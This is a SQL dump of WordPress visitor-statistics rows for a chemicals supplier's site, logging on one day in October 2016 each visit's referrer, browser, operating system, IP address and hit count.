INSERT INTO `wp_statistics_visitor` VALUES (666, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.14.158.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (667, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '100.38.92.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (668, '2016-10-06', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.16', '', '119.128.173.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (669, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (670, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CFwQFjAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=hdb1V_HnMNnbjgeReg&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'Chrome', 'Android', '44.0.2403.133', '', '66.102.6.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (671, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/vazo/', 'Chrome', 'Android', '44.0.2403.133', '', '66.102.6.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (672, '2016-10-06', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.25.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (673, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.71', '', '192.210.215.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (674, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '192.210.215.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (675, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.141.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (676, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '104.155.116.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (677, '2016-10-06', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '2.50.33.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (678, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.64.7.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (679, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.64.7.60', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (680, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '52.0.2743.116', '', '45.35.63.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (681, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.197.168.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (682, '2016-10-06', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '103.232.232.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (683, '2016-10-06', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '182.71.39.42', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (684, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.19.233.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (685, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '104.32.55.142', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (686, '2016-10-06', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.154.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (687, '2016-10-06', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.156.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (688, '2016-10-06', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwj9huzOu8XPAhXEOSYKHdWRCM4QFggvMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-3140%2F&usg=AFQjCNGEHxTodE12CyMobFYTxHlLQSfIUA&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '116.12.132.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (689, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '176.94.119.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (690, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.168.40', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (691, '2016-10-06', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '218.146.32.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (692, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.97.66.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (693, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '95.135.62.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (694, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (695, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (696, '2016-10-06', 'https://www.google.co.in/', 'Chrome', 'Windows', '52.0.2743.116', '', '114.143.16.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (697, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '87.58.220.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (698, '2016-10-06', 'https://duckduckgo.com/', 'Firefox', 'Windows', '49.0', '', '76.174.75.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (699, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '165.243.5.50', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (700, '2016-10-06', 'https://www.google.rs/', 'Opera Next', 'Windows', '40.0.2308.81', '', '79.101.99.178', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (701, '2016-10-06', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (702, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (703, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.140.123.94', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (704, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '24.78.37.145', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (705, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.253.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (706, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.33.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (707, '2016-10-06', 'https://www.google.co.uk/', 'Safari', 'Macintosh', '10.0', '', '90.204.86.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (708, '2016-10-06', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '78.189.102.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (709, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (710, '2016-10-06', 'https://www.miller-stephenson.com/vazo-free-radical-initiator/', 'MSIE', 'Windows', '9.0', '', '204.79.180.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (711, '2016-10-06', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (712, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '65.151.2.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (713, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '213.134.225.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (714, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '86.110.140.227', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (715, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (716, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (717, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (718, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '211.127.239.18', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (719, '2016-10-06', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '81.153.159.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (720, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '129.176.151.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (721, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.240.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (722, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.144.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (723, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '112.198.243.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (724, '2016-10-06', 'https://www.google.mu/url?url=https://www.miller-stephenson.com/product/epikure-3234/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiK-97A6MXPAhXIMhoKHcoBCJ8QFggjMAM&usg=AFQjCNFGpxx0Onu3t_RNLgVCRk4DMrXzpA', 'MSIE', 'Windows', '9.0', '', '197.225.146.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (725, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '46.100.50.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (726, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '193.54.90.194', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (727, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.191.84.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (728, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/solvents/solvsys/solvent-cleaners/', 'Chrome', 'Windows', '53.0.2785.143', '', '180.191.135.77', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (729, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '60.185.141.127', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (730, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.220.13.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (731, '2016-10-06', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '88.98.64.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (732, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '79.120.228.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (733, '2016-10-06', 'https://www.google.com.lb/', 'Chrome', 'Windows', '53.0.2785.143', '', '94.187.48.97', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (734, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (735, '2016-10-06', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '111.93.191.254', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (736, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '104.250.226.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (737, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.250.226.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (738, '2016-10-06', 'https://nova.rambler.ru/search?query=epoxide%20resin%20Eponex%201510&suggest=false&page=4', 'Firefox', 'Windows', '49.0', '', '91.151.176.81', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (739, '2016-10-06', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.196.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (740, '2016-10-06', 'https://www.google.com.pk/', 'Firefox', 'Windows', '49.0', '', '39.47.51.182', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (741, '2016-10-06', '(null)', 'Firefox', 'Windows', '33.0', '', '162.243.5.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (742, '2016-10-06', 'https://www.google.pl/', 'Opera Next', 'Windows', '40.0.2308.62', '', '195.248.254.21', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (743, '2016-10-06', 'https://kharkov.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (744, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.26.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (745, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.70.144.167', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (746, '2016-10-06', 'https://www.google.com.hk/', 'Chrome', 'Windows', '52.0.2743.116', '', '115.171.43.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (747, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '90.24.160.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (748, '2016-10-06', 'https://www.google.pl/', 'Chrome', 'Windows', '44.0.2403.155', '', '81.210.89.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (749, '2016-10-06', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiKya6y_sXPAhWBXCwKHRvSBKEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '147.108.61.93', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (750, '2016-10-06', 'https://www.google.de/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.134.187.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (751, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (752, '2016-10-06', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (753, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '50.92.23.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (754, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '145.64.134.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (755, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (756, '2016-10-06', 'https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi4qvueiMbPAhWK4CYKHeHqB7cQFggnMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2Fsemi-permanent-release-agents%2F&usg=AFQjCNEyZY9tFvj5P78CMI5j-Qcxi0vk9Q', 'MSIE', 'Windows', '11.0', '', '82.136.107.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (757, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '89.255.51.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (758, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '52.91.205.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (759, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwj0tL-gicbPAhWDMj4KHc4GDmIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=1K2_qVrPTSGUhrB3Bclnig&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '192.168.72.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (760, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi0t9LkicbPAhXGKMAKHc_RA2kQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'Firefox', 'Windows', '19.0', '', '147.110.251.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (761, '2016-10-06', 'https://www.google.be/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '134.58.253.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (762, '2016-10-06', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '49.35.72.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (763, '2016-10-06', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1159, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (764, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9537.53', '', '207.231.231.117', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (765, '2016-10-06', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwi20LqvjsbPAhXMPBQKHQlUCj8QFgg8MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-88%2F&usg=AFQjCNHSpyGWW5ApiVkkCFINGDiXS5h3Cg&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '62.8.160.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (766, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (767, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (768, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.226.40.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (769, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (770, '2016-10-06', 'https://www.miller-stephenson.com/vertrel-fluids/', 'MSIE', 'Windows', '9.0', '', '204.79.180.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (771, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '217.251.51.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (772, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (773, '2016-10-06', 'https://www.miller-stephenson.com/product/xp-2a1/', 'Firefox', 'Windows', '49.0', '', '50.167.97.155', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (774, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '144.160.226.91', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (775, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.49.83.154', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (776, '2016-10-06', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.139.174', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (777, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (778, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (779, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Chrome', 'Windows', '53.0.2785.116', '', '24.177.144.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (780, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '66.87.97.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (781, '2016-10-06', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '142.176.45.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (782, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '66.189.65.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (783, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '65.121.44.50', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (784, '2016-10-06', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.51.79.45', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (785, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (786, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.55.89.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (787, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (788, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.255.168.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (789, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '202.100.249.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (790, '2016-10-06', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.50.119.48', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (791, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.27.253.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (792, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (793, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.79.184.249', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (794, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.193.177.246', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (795, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (796, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (797, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (798, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '52.89.251.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (799, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (800, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (801, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/release-agents/high-temperature/', 'Safari', 'iPad', '9.0', '', '116.109.154.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (802, '2016-10-06', 'https://www.miller-stephenson.com/news/', 'Chrome', 'Windows', '53.0.2785.143', '', '180.191.134.50', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (803, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '76.195.112.218', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (804, '2016-10-06', 'https://www.google.ca/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiFz5uuoMbPAhXBGz4KHbh0CQAQFggVMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '9.0', '', '131.137.245.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (805, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjdqPDDoMbPAhVPxCYKHXUEBt8QFgg-MAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-580582%2F&usg=AFQjCNFPeZBf-lu3w44UOE1nejRxLgrt9A&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.128.192.32', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (806, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '12.45.190.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (807, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.173.238.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (808, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '180.191.132.84', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (809, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '47.89.27.83', '000', 2, 0); 
